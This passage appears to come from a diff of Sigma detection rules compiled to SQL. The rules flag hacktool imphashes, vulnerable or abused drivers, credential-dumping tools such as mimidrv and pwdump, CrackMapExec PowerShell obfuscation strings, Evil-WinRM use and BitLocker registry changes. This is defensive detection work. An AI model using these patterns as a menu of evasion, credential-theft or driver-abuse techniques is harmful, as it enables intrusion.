'24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 
'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a 
PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.collection", + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.t1027.005" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 
short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' 
ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", - "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 
'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' 
OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", + "description": "Detects usage of winget to add new potentially suspicious download sources", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes 
LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR 
